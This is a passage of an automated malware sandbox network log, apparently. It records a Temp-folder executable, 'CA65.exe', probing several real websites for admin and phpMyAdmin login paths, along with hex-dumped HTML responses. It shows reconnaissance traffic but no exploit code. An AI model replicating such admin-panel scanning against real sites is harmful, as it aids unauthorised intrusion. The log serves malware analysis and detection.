2023-12-22 20:15:11 UTC	1369	IN	Data Raw: 3d 22 6c 69 6e 6b 20 64 69 66 2d 6c 22 3e 53 65 65 20 64 65 74 61 69 6c 73 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 72 65 64 69 74 69 20 22 3e 0a 3c 75 6c 3e 0a 3c 6c 69 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6d 67 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 68 64 76 33 2d 69 6d 67 2f 33 30 64 61 79 73 6d 61 6c 6c 69 63 6f 2e 70 6e 67 22 20 61 6c 74 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 3e 33 30 2d 64 61 79 20 6d 6f 6e 65 79 20 62 61 63 6b 20 67 75 61 72 61 6e 74 65 65 3c 2f 73 70 61 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 Data Ascii: ="link dif-l">See details</a></div><div class="crediti "><ul><li><div class="img"><img src="https://static.HugeDomains.com/images/hdv3-img/30daysmallico.png" alt></div><div class="content"><span>30-day money back guarantee</span></div></li><li
2023-12-22 20:15:11 UTC	1369	IN	Data Raw: 6d 65 22 3e 56 69 78 65 6a 2e 63 6f 6d 3c 2f 68 31 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 64 2d 74 2d 6e 22 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 66 6f 72 20 73 61 6c 65 3a 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 72 65 65 6e 22 3e 24 34 2c 39 39 35 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 61 62 6c 65 74 2d 62 6c 6f 63 6b 2d 73 22 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 63 65 6e 74 65 72 22 3e 42 75 79 20 6e 6f 77 20 66 6f 72 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 72 65 65 6e 22 3e 24 34 2c 39 39 35 3c 2f 73 70 61 6e 3e 20 6f 72 20 70 61 79 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 72 65 65 6e 22 3e 24 32 30 38 2e 31 33 3c 2f 73 70 61 6e 3e 20 70 65 72 20 6d 6f 6e 74 Data Ascii: me">Vixej.com</h1><p class="d-t-n">This domain is for sale: <span class="green">$4,995</span></p></div><div class="tablet-block-s"><p class="text-center">Buy now for <span class="green">$4,995</span> or pay <span class="green">$208.13</span> per mont
2023-12-22 20:15:11 UTC	1369	IN	Data Raw: 2d 62 6f 74 74 6f 6d 3a 32 35 70 78 3b 22 3e 0a 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 22 3e 6f 72 3c 2f 73 70 61 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 61 62 6c 65 74 2d 62 6c 6f 63 6b 2d 72 69 67 68 74 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 70 61 79 6d 65 6e 74 2d 70 6c 61 6e 2d 73 65 74 75 70 2e 63 66 6d 3f 64 3d 56 69 78 65 6a 2e 63 6f 6d 22 20 63 6c 61 73 73 3d 22 62 74 6e 22 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 33 30 70 78 3b 20 77 69 64 74 68 3a 32 34 37 70 78 3b 20 6d 69 6e 2d 77 69 64 74 68 3a 32 34 37 70 78 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 20 Data Ascii: -bottom:25px;"><span style="font-size:16px;">or</span></div><div class="tablet-block-right"><a href="https://www.HugeDomains.com/payment-plan-setup.cfm?d=Vixej.com" class="btn" style="padding-right:30px; width:247px; min-width:247px; margin-top:10px;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
313	192.168.2.4	56580	50.31.65.5	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:11 UTC	170	OUT	GET /pma/ HTTP/1.1 Host: saltdelcolom.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:12 UTC	535	IN	HTTP/1.1 404 Not Found Connection: close x-powered-by: PHP/7.3.33 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 link: <https://saltdelcolom.com/wp-json/>; rel="https://api.w.org/" transfer-encoding: chunked date: Fri, 22 Dec 2023 20:15:12 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2023-12-22 20:15:12 UTC	833	IN	Data Raw: 31 30 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 63 61 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0d 0a 09 20 3c 74 69 74 6c 65 3e 4e 6f 20 73 26 23 38 32 31 37 3b 68 61 20 74 72 6f 62 61 74 20 6c 61 20 70 c3 a0 67 69 6e 61 20 26 23 38 32 31 31 3b 20 53 61 6c 74 20 64 Data Ascii: 10000<!DOCTYPE html><html lang="ca"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <title>No s’ha trobat la pgina – Salt d
2023-12-22 20:15:12 UTC	14994	IN	Data Raw: 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 61 6c 74 64 65 6c 63 6f 6c 6f 6d 2e 63 6f 6d 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 32 2e 33 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 61 2c 74 29 7b 76 61 72 20 6e 2c 72 2c 6f 2c 69 3d 61 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 70 3d 69 Data Ascii: \/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/saltdelcolom.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.2.3"}};/! This file is auto-generated /!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i
2023-12-22 20:15:12 UTC	16384	IN	Data Raw: 6e 2c 2e 65 6c 65 6d 65 6e 74 6f 72 2d 62 75 74 74 6f 6e 2d 77 72 61 70 70 65 72 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 62 75 74 74 6f 6e 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 35 38 29 3b 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 62 75 74 74 6f 6e 2d 77 72 61 70 70 65 72 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 62 75 74 74 6f 6e 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 35 37 31 34 32 38 35 37 31 34 32 38 36 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 65 6d 3b 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 31 70 78 3b 7d 62 6f 64 79 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 62 75 74 74 6f 6e 2e 65 6c 65 6d 65 6e 74 6f 72 2d 73 69 7a Data Ascii: n,.elementor-button-wrapper .elementor-button:visited{color:rgba(0,0,0,0.58);}.elementor-button-wrapper .elementor-button{font-weight:600;font-size:12px;font-size:0.85714285714286rem;line-height:1em;letter-spacing:1px;}body .elementor-button.elementor-siz
2023-12-22 20:15:12 UTC	16384	IN	Data Raw: 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 30 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 30 29 3b 7d 3a 72 6f 6f 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 20 2e 68 61 73 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 30 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 30 29 3b 7d 3a 72 6f 6f 74 20 2e 68 61 73 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 31 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 31 29 3b 7d 3a 72 6f 6f 74 20 2e 68 61 73 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 Data Ascii: -global-color-0-color{color:var(--ast-global-color-0);}:root .wp-block-button .has-ast-global-color-0-background-color{background-color:var(--ast-global-color-0);}:root .has-ast-global-color-1-color{color:var(--ast-global-color-1);}:root .has-ast-global-c
2023-12-22 20:15:12 UTC	16384	IN	Data Raw: 65 66 74 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 30 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 20 32 65 6d 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 20 3e 20 2e 61 6c 69 67 6e 72 69 67 68 74 7b 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 32 65 6d 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 20 30 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 20 3e 20 2e 61 6c 69 67 6e 63 65 6e 74 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 20 21 69 6d 70 6f 72 74 61 6e 74 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 20 21 69 6d 70 6f 72 74 61 6e 74 3b Data Ascii: eft;margin-inline-start: 0;margin-inline-end: 2em;}body .is-layout-constrained > .alignright{float: right;margin-inline-start: 2em;margin-inline-end: 0;}body .is-layout-constrained > .aligncenter{margin-left: auto !important;margin-right: auto !important;
2023-12-22 20:15:12 UTC	566	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 2c 20 2e 77 63 2d 62 6c 6f 63 6b 2d 67 72 69 64 5f 5f 70 72 6f 64 75 63 74 2d 6f 6e 73 61 6c 65 7b 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 35 38 29 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 36 63 62 36 30 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 36 63 62 36 30 30 3b 7d 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 61 2e 62 75 74 74 6f 6e 3a 68 6f 76 65 72 2c 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 62 75 74 74 6f 6e 2e 62 75 74 74 6f 6e 3a 68 6f 76 65 72 2c 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6d 65 73 73 61 67 65 20 61 2e 62 75 74 74 6f 6e 3a 68 6f 76 65 72 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 23 72 65 73 70 6f 6e Data Ascii: p-block-button__link, .wc-block-grid__product-onsale{color:rgba(0,0,0,0.58);border-color:#6cb600;background-color:#6cb600;}.woocommerce a.button:hover, .woocommerce button.button:hover, .woocommerce .woocommerce-message a.button:hover,.woocommerce #respon
2023-12-22 20:15:12 UTC	16384	IN	Data Raw: 62 35 63 64 0d 0a 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 36 63 62 36 30 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 36 63 62 36 30 30 3b 7d 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 61 2e 62 75 74 74 6f 6e 2c 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 62 75 74 74 6f 6e 2e 62 75 74 74 6f 6e 2c 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6d 65 73 73 61 67 65 20 61 2e 62 75 74 74 6f 6e 2c 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 23 72 65 73 70 6f 6e 64 20 69 6e 70 75 74 23 73 75 62 6d 69 74 2e 61 6c 74 2c 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 61 2e 62 75 74 74 6f 6e 2e 61 6c 74 2c 20 2e 77 Data Ascii: b5cdlock-button__link:hover{color:#000000;border-color:#6cb600;background-color:#6cb600;}.woocommerce a.button, .woocommerce button.button, .woocommerce .woocommerce-message a.button, .woocommerce #respond input#submit.alt, .woocommerce a.button.alt, .w
2023-12-22 20:15:13 UTC	16384	IN	Data Raw: 69 6e 67 2c 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 70 61 67 65 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 63 68 65 63 6b 6f 75 74 20 66 6f 72 6d 20 23 6f 72 64 65 72 5f 72 65 76 69 65 77 2c 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 70 61 67 65 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 63 68 65 63 6b 6f 75 74 20 66 6f 72 6d 20 23 6f 72 64 65 72 5f 72 65 76 69 65 77 5f 68 65 61 64 69 6e 67 7b 77 69 64 74 68 3a 34 30 25 3b 66 6c 6f 61 74 3a 72 69 67 68 74 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 3b 63 6c 65 61 72 3a 72 69 67 68 74 3b 7d 7d 73 65 6c 65 63 74 2c 20 2e 73 65 6c 65 63 74 32 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 73 65 6c 65 63 74 32 2d 73 65 6c 65 63 74 69 6f 6e 2d 2d 73 69 6e 67 6c 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c Data Ascii: ing, .woocommerce-page.woocommerce-checkout form #order_review, .woocommerce-page.woocommerce-checkout form #order_review_heading{width:40%;float:right;margin-right:0;clear:right;}}select, .select2-container .select2-selection--single{background-image:url
2023-12-22 20:15:13 UTC	13786	IN	Data Raw: 6c 61 73 73 3d 22 73 65 61 72 63 68 2d 66 6f 72 6d 22 20 61 63 74 69 6f 6e 3d 22 68 74 74 70 73 3a 2f 2f 73 61 6c 74 64 65 6c 63 6f 6c 6f 6d 2e 63 6f 6d 2f 22 3e 0a 09 3c 6c 61 62 65 6c 3e 0a 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 63 72 65 65 6e 2d 72 65 61 64 65 72 2d 74 65 78 74 22 3e 43 65 72 63 61 3a 3c 2f 73 70 61 6e 3e 0a 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 73 65 61 72 63 68 22 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 2d 66 69 65 6c 64 22 20 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 43 65 72 63 61 20 26 68 65 6c 6c 69 70 3b 22 20 76 61 6c 75 65 3d 22 22 20 6e 61 6d 65 3d 22 73 22 20 74 61 62 69 6e 64 65 78 3d 22 2d 31 22 3e 0a 09 09 09 3c 2f 6c 61 62 65 6c 3e 0a 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 Data Ascii: lass="search-form" action="https://saltdelcolom.com/"><label><span class="screen-reader-text">Cerca:</span><input type="search" class="search-field" placeholder="Cerca …" value="" name="s" tabindex="-1"></label><input type="submit"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
314	192.168.2.4	56588	69.42.204.12	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:11 UTC	167	OUT	GET /admin HTTP/1.1 Host: bldowney.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:11 UTC	164	IN	HTTP/1.1 404 Not Found Date: Fri, 22 Dec 2023 20:15:11 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2023-12-22 20:15:11 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
315	192.168.2.4	56661	34.206.39.153	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:11 UTC	210	OUT	GET /admin/login HTTP/1.1 Host: aldine.org.com Accept: / Accept-Encoding: deflate, gzip Cookie: SERVERID=vpc4\|ZYXxK\|ZYXxK User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:11 UTC	1398	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 22 Dec 2023 20:15:11 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Download-Options: noopen X-Permitted-Cross-Domain-Policies: none Referrer-Policy: strict-origin-when-cross-origin Link: </assets/admin-c3cec993e40a8cbbfbec9ac43929a8f741267c75edd87a27f07fe71f4648779e.css>; rel=preload; as=style; nopush,</packs/js/application-28182f954f58ae153a93.js>; rel=preload; as=script; nopush,</packs/js/admin-41c10d089a9b82c4a81b.js>; rel=preload; as=script; nopush,</packs/js/tablednd-7691ec9e4b7721f2be15.js>; rel=preload; as=script; nopush Vary: Accept ETag: W/"7975ff7a7639635398c98afd6c8c776c" Cache-Control: max-age=0, private, must-revalidate Set-Cookie: _digiadmin3_session=ky6%2B7QyaELlWWXO49MowXiFMnkcNw6ldMMG3sWz0df%2FOcuhq9P5fS%2BcftIm6CYwDk5YIBx5q63G6rGnyVM%2Bc59Vh0EYmwimP0H3y4dSc%2BNETaaBgD%2B8hsjWCKaagQBNIO84Mm4iigM%2BL4vb6GFyM4Qig2u6cdWxjUb0fie1YWvvcjf8%2BqhEp64Xd9OSfzLi5jJsXt4%2Fd24QdlT98qS3mqO9MlpOtuYubl7673gTaRT8kxFdKResGeIXeYimx%2FonU9sAJjdofTckgSYixHgdmeVbydzioVBj2gr27--GGOs36EnVUhEc78W--SsfERk4suwjuXZUDcoZKCQ%3D%3D; path=/; HttpOnly; SameSite=Lax X-Request-Id: 6b6bf382-4e56-448f-96c1-9ee85e6f2df2 X-Runtime: 0.026743 Set-Cookie: SERVERID=vpc4\|ZYXxL\|ZYXxK; path=/
2023-12-22 20:15:11 UTC	5725	IN	Data Raw: 62 32 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 64 6d 69 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 61 64 6d 69 6e 2d 63 33 63 65 63 39 39 33 65 34 30 61 38 63 62 62 66 62 65 63 39 61 63 34 33 39 32 39 61 38 66 37 34 31 32 36 37 63 37 35 65 64 64 38 37 61 32 37 66 30 37 66 65 37 31 66 34 36 34 38 37 37 39 65 2e 63 73 73 22 20 2f 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 70 61 63 6b 73 2f 6a 73 2f 61 70 70 6c 69 63 61 74 69 6f 6e 2d 32 38 31 38 32 66 39 35 34 66 35 38 61 65 31 35 33 61 39 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c Data Ascii: b2c<!DOCTYPE html><html><head><title>Admin</title><link rel="stylesheet" media="all" href="/assets/admin-c3cec993e40a8cbbfbec9ac43929a8f741267c75edd87a27f07fe71f4648779e.css" /><script src="/packs/js/application-28182f954f58ae153a93.js"></script><

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
316	192.168.2.4	56133	35.197.165.27	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:11 UTC	190	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: www.conquestaccounting.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:12 UTC	698	IN	HTTP/1.1 404 Not Found Connection: close expires: Wed, 11 Jan 1984 05:00:00 GMT content-type: text/html; charset=UTF-8 link: <https://www.conquestaccounting.com.au/wp-json/>; rel="https://api.w.org/" cache-control: no-cache, must-revalidate, max-age=0 x-cacheable: yes x-litespeed-cache-control: public,max-age=3600 x-litespeed-tag: fed_HTTP.404,fed_404,fed_URL.0045a36e9aa35622a617ea518918c32d,fed_ x-litespeed-cache: miss transfer-encoding: chunked date: Fri, 22 Dec 2023 20:15:11 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2023-12-22 20:15:12 UTC	670	IN	Data Raw: 31 30 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6f 6e 71 75 65 73 74 61 63 63 6f 75 6e 74 69 6e 67 2e 63 6f 6d 2e 61 75 2f 50 68 70 4d 79 41 64 6d 69 6e 2f 22 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 Data Ascii: 10000<!DOCTYPE html><html lang="en-US" class="no-js "><head><meta charset="UTF-8" /><link rel="alternate" hreflang="en-US" href="https://www.conquestaccounting.com.au/PhpMyAdmin/"/><meta name='robots' content='noindex, follow' /><script type="te
2023-12-22 20:15:12 UTC	14994	IN	Data Raw: 69 63 6f 6e 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 2f 63 64 6e 2d 36 34 31 62 61 35 38 31 63 31 61 63 31 61 33 35 36 38 62 36 33 33 38 38 2e 63 6c 6f 73 74 65 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 31 36 2f 30 38 2f 63 6f 6e 71 75 65 73 74 2d 66 61 76 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 31 2e 34 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e Data Ascii: icon" /><link rel="apple-touch-icon" href="//cdn-641ba581c1ac1a3568b63388.closte.com/wp-content/uploads/2016/08/conquest-favicon.png" />... This site is optimized with the Yoast SEO plugin v21.4 - https://yoast.com/wordpress/plugins/seo/ --><title>
